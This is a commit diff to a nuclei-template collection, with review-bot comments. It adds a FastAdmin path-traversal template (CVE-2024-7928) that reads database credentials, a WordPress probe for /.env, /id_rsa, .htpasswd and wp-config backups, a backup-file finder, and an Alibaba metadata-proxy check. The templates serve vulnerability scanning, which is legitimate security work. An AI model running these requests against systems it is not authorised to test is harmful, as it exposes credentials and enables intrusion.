Commit
20241104
actions-user committed Nov 4, 2024
1 parent 290efb5 commit 2d685ce
Showing 8 changed files with 414 additions and 7 deletions.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241103
20241104
5 changes: 5 additions & 0 deletions poc.txt
Expand Up @@ -6860,6 +6860,7 @@
./poc/backup/snapshot-backup-518ee5abfc5c619140ace18f02fca8ee.yaml
./poc/backup/snapshot-backup.yaml
./poc/backup/urbackup-panel.yaml
./poc/backup/vabro-backup-file-finder.yaml
./poc/backup/veeam-backup-azure-panel.yaml
./poc/backup/veeam-backup-gcp.yaml
./poc/backup/veritas-netbackup.yaml
Expand Down Expand Up @@ -44564,6 +44565,7 @@
./poc/cve/CVE-2024-7895.yaml
./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml
./poc/cve/CVE-2024-7918.yaml
./poc/cve/CVE-2024-7928.yaml
./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml
./poc/cve/CVE-2024-7950.yaml
./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
Expand Down Expand Up @@ -57873,6 +57875,7 @@
./poc/exposed/webpack-sourcemap-disclosure.yaml
./poc/exposed/wget-hsts-list-exposure.yaml
./poc/exposed/wordpress-config-disclosure.yaml
./poc/exposed/wordpress-exposure.yaml
./poc/exposed/wordpress-path-disclosure.yaml
./poc/exposed/wordpress-sensitive-config.yaml
./poc/exposed/wordpress-wp-config-exposure.yml
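Review bot: wordpress-exposure.yaml is indexed right beside wordpress-config-disclosure.yaml, wordpress-sensitive-config.yaml and wordpress-wp-config-exposure.yml, which already probe wp-config.php backups, and the new template's own description (further down in this commit) concedes that its checks overlap with similar templates; before indexing it, diff its `/wp-config.php{{suffix}}` paths against those three and keep only the paths they do not already request, otherwise every scan over `poc/exposed/` pays for the same requests twice.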
Expand Down Expand Up @@ -112312,6 +112315,7 @@
./poc/remote_code_execution/Typecho-Rce.yaml
./poc/remote_code_execution/VMware-CVE-2022-22954-RCE.yml
./poc/remote_code_execution/VOIPrce.yaml
./poc/remote_code_execution/Wifisky-7-RCE.yaml
./poc/remote_code_execution/Wordpress-Social_Warfare_Plugins-RCE.yaml
./poc/remote_code_execution/Wordpress-force_download_Plugins-FileDownload.yaml
./poc/remote_code_execution/YealinkPreauthrce.yaml
Expand Down Expand Up @@ -131376,6 +131380,7 @@
./poc/wordpress/wordpress-exit-box-lite-b885aa8757fedd66d898c12224efaf9e.yaml
./poc/wordpress/wordpress-exit-box-lite-e4f715486bc2f2be2ab66f9091e37d49.yaml
./poc/wordpress/wordpress-exit-box-lite.yaml
./poc/wordpress/wordpress-exposure.yaml
./poc/wordpress/wordpress-ext-adaptive-images-lfi.yaml
./poc/wordpress/wordpress-ext-adaptive-images-lfi.yml
./poc/wordpress/wordpress-ext-mailpress-rce.yaml
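Review bot: this hunk indexes a second wordpress-exposure.yaml under ./poc/wordpress/ on top of the ./poc/exposed/wordpress-exposure.yaml added earlier in this file; if both are the same template (the one shown in this commit carries `id: wordpress-exposed-files`), a single `-t poc/` run picks both up and runs the same 1000-plus requests twice per host. Elsewhere this index separates copies by a content-hash suffix (e.g. `./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml`), so either drop one copy or follow that convention.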
140 changes: 140 additions & 0 deletions poc/backup/vabro-backup-file-finder.yaml
@@ -0,0 +1,140 @@
id: backup-files
info:
name: Backup Files Finder (information disclosure)
author: Vabro
severity: High
description: |
This template checks for common backup file extensions that may have been left exposed on a target.
requests:
- name: backup-files
path:
- "/backup"
- "/backups"
- "/root"
- "/www"
- "/public_html"
- "/ht_docs"
- "/files"
- "/images"
- "/assets"
- "/media"
- "/documents"
- "/resources"
- "/wp-content/uploads"
method: GET
matchers-condition: or
matchers:
- type: word
words:
- ".bak"
- ".old"
- ".zip"
- ".tar"
- ".tar.gz"
- ".tar.bz2"
- ".tar.xz"
- ".7z"
- ".rar"
- ".gz"
- ".bz2"
- ".xz"
- ".sql"
- ".db"
- ".bak"
- ".swp"
- ".swp"
- ".save"
- ".save"
- ".sav"
- ".sav"
- ".copy"
- ".copy"
- ".backup"
- ".backup"
- ".orig"
- ".orig"
- ".old"
- ".old"
- ".tmp"
- ".tmp"
- ".temp"
- ".temp"
- ".test"
- ".test"
- ".demo"
- ".demo"
- ".dev"
- ".dev"
- ".sample"
- ".sample"
- ".example"
- ".example"
- ".backup"
- ".backup"
- ".config"
- ".config"
- ".conf"
- ".conf"
- ".log"
- ".log"
- ".txt"
- ".txt"
- ".doc"
- ".doc"
- ".docx"
- ".xls"
- ".xlsx"
- ".ppt"
- ".pptx"
- ".pdf"
- ".csv"
- ".bak"
- ".bak"
- ".swp"
- ".swp"
- ".save"
- ".save"
- ".sav"
- ".sav"
- ".copy"
- ".copy"
- ".backup"
- ".backup"
- ".orig"
- ".orig"
- ".old"
- ".old"
- ".tmp"
- ".tmp"
- ".temp"
- ".temp"
- ".test"
- ".test"
- ".demo"
- ".demo"
- ".dev"
- ".dev"
- ".sample"
- ".sample"
- ".example"
- ".example"
- ".backup"
- ".backup"
- ".config"
- ".config"
- ".conf"
- ".conf"
- ".log"
- ".log"
- ".txt"
- ".txt"
- ".doc"
- ".doc"
- ".docx"
- ".xls"
- ".xlsx"
- ".ppt"
- ".pptx"
- ".pdf"
- ".csv"
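Review bot: the single word matcher fires on any response body that merely contains a string such as `.txt`, `.log` or `.pdf`, and nothing ties it to a backup file: there is no status check, no directory-listing anchor and no `part`, so a custom 404 page or any HTML page that links a PDF is reported as `severity: High`. Make it `matchers-condition: and` with a `type: status` matcher on 200 plus a body word such as `Index of` (or a regex along the lines of `href="[^"]+\.(bak|old|sql|zip|tar\.gz)"`), and drop the generic document extensions (`.txt`, `.pdf`, `.doc`, `.csv`), which are not backups. Further points in the same block: the word list is the same block pasted twice and `.bak` appears four times; `matchers-condition: or` over a single matcher does nothing; the paths lack the `{{BaseURL}}` prefix the other templates in this commit use; `/root`, `/www`, `/public_html` and `/images` are directories, not backup files; `severity: High` should be lowercase `high` like the rest of the repo; and the template starts on the legacy `requests:` key while the metadata-alibaba.yaml hunk in this very commit migrates that file to `http:`.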
51 changes: 51 additions & 0 deletions poc/cve/CVE-2024-7928.yaml
@@ -0,0 +1,51 @@
id: CVE-2024-7928

info:
name: FastAdmin < V1.3.4.20220530 - Path Traversal
author: s4e-io
severity: medium
description: |
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
reference:
- https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd
- https://github.com/bigb0x/CVE-2024-7928
- https://nvd.nist.gov/vuln/detail/CVE-2024-7928
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-7928
cwe-id: CWE-22
cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fastadmin
product: fastadmin
fofa-query: icon_hash="-1036943727"
tags: cve,cve2024,fastadmin,lfi

http:
- raw:
- |
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'jsonpReturn('
- '"password":'
- '"username":'
- '"database":'
condition: and

- type: word
part: content_type
words:
- 'application/javascript'

- type: status
status:
- 200
# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
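Review bot: the trailing `# digest:` line is the upstream nuclei-templates signature over the exact bytes of the file, so any local edit (even re-indenting or touching the reference list) means nuclei's template-signing check no longer verifies it; either keep the file byte-identical to upstream or strip the digest line whenever it is modified here. Two smaller points: `cpe:` pins the single version `1.3.3.20220121` while `name:` advertises `< V1.3.4.20220530`, so a `*` version would match the stated range; and the raw request carries no session cookie, so if the check works as written the endpoint is reachable pre-auth and the `PR:L` / 4.3 vector copied from NVD understates a read of `"password":` out of the database config. Keep the NVD vector, but the repo's own `severity:` could reasonably be `high`.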
84 changes: 84 additions & 0 deletions poc/exposed/wordpress-exposure.yaml
@@ -0,0 +1,84 @@
id: wordpress-exposed-files

info:
name: WordPress Exposed Sensitive Files Detection
author: Redflare-Cyber
severity: high
description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates.
tags: wordpress, exposure, creds,

requests:
- method: GET
path:
- "{{BaseURL}}{{file}}"

attack: clusterbomb

payloads:
file:
- /wp-config.php{{suffix}}
- /backup{{suffix}}
- /database{{suffix}}
- /dump{{suffix}}
- /wp-config.php{{archive_ext}}
- /backup{{archive_ext}}
- /database{{archive_ext}}
- /dump{{archive_ext}}
- /wp-config-sample.php
- /.env
- /.git/config
- /.svn/entries
- /.hg/requires
- /.bzr/branch-format
- /.DS_Store
- /debug.log
- /error_log
- /phpinfo.php
- /composer.lock
- /composer.json
- /id_rsa
- /id_rsa.pub
- /.htpasswd
- /.htaccess
- /logs/access.log
- /logs/error.log
- /wp-content/debug.log
- /wp-content/uploads/.htaccess
- /wp-includes/php.ini
- /php.ini
- /info.php
suffix:
- ''
- '~'
- '.bak'
- '.old'
- '.save'
- '.swp'
- '.swo'
- '.sql'
archive_ext:
- '.zip'
- '.tar.gz'
- '.tar.bz2'
- '.tar'
- '.gz'

matchers-condition: and
matchers:
- type: status
status:
- 200
- 206

- type: regex
part: body
regex:
- '(?i)(DB_(NAME|USER|PASSWORD|HOST))'
- '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'
- '(?i)(FTP_(USER|PASS))'
- '(?i)(<title>phpinfo\(\)</title>)'
- '(?i)(repositoryformatversion|svn|openssl)'
- '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)'
- '(?i)(root:.*:(/bin/bash|/bin/sh))'
- '(?i)(\$cfg\["blowfish_secret"\])'
condition: or
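Review bot: `attack: clusterbomb` over three payload sets (`file` x `suffix` x `archive_ext`, 31 x 8 x 5) issues 1240 requests per host, and every `file` entry without a placeholder (`/.env`, `/.git/config`, `/id_rsa`, ...) is sent 40 times identically; split this into three request blocks, one path list with `{{suffix}}`, one with `{{archive_ext}}` and one plain list, each with its own `payloads:`, and add `metadata: max-request` so the cost is visible. Several paths can also never match because no matcher covers their content (`/.hg/requires`, `/.bzr/branch-format`, `/.DS_Store`, `/composer.json`, `/composer.lock`, `/.htaccess`, the log files), while the `root:.*:(/bin/bash|/bin/sh)` regex targets /etc/passwd, which is never requested. The `(?i)(repositoryformatversion|svn|openssl)` regex matches any 200 page that mentions "svn" or "openssl" in passing; anchor it to the file actually requested, e.g. `\[core\]\s+repositoryformatversion` for `/.git/config`. Minor: `requests:` is the legacy key (the metadata-alibaba.yaml hunk in this commit moves to `http:`), and `tags: wordpress, exposure, creds,` ends in a comma that yields an empty tag; use `tags: wordpress,exposure,creds`.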
18 changes: 12 additions & 6 deletions poc/other/metadata-alibaba.yaml
@@ -1,8 +1,9 @@
id: metadata-service-alibaba

# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its
# own metadata sevice.
# the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
Expand All @@ -11,29 +12,34 @@ info:
author: sullo
severity: critical
description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://www.alibabacloud.com/help/doc-detail/108460.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
tags: exposure,config,alibaba,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests:
metadata:
max-request: 2
tags: exposure,config,alibaba,proxy,misconfig,metadata

http:
- raw:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
Host: {{hostval}}
payloads:
hostval:
- alibaba.interact.sh
- alibaba.oast.pro
- 100.100.100.200
unsafe: true
matchers:
- type: word
part: body
words:
- "zone-id"

# digest: 490a004630440220495fde6b8e524846446e53dead7f589f22c254d0ca7b6e09e07210469773749f0220264d2180b4589c8663f68bab544d951ad739fae7f3b6dccaaacee29718cb4778:922c64590222798bb761d5b6d8e72950
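Review bot: `max-request: 2` is added while the `hostval` payload list below it carries three entries (`alibaba.interact.sh`, `alibaba.oast.pro`, `100.100.100.200`), so unless one of those is removed in this change the metadata should read `max-request: 3`; the value is informational, but it is the number readers use to estimate scan cost. The rest of the hunk (typo fixes in the comment and remediation, `requests:` to `http:`, `tags:` moved under `info:`) is the shape the other templates added in this commit should follow.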